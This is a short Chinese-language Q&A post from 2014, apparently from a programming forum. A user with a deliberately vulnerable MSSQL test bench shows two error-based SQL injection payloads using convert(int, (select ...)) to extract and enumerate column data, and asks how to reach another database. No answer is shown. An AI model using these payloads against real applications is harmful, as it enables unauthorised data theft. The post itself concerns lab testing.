【发布时间】:2014-03-31 04:21:06
【问题描述】:
我设置了一个易受 mssql 注入攻击的测试台应用程序,我想知道如何从另一个数据库中提取列数据?要从当前数据库中提取列数据,我们这样做:
convert(int,(select columnnamegoeshere from tablenamegoeshere))--
然后枚举我们所做的其他列数据:
convert(int,(select columnnamegoeshere from tablenamegoeshere where columnnamegoeshere not in ('firstentryfromcolumn')))--
但是如果它不在默认数据库中,并且我们想从另一个数据库中提取列数据,我们该怎么做呢?谢谢。
【问题讨论】: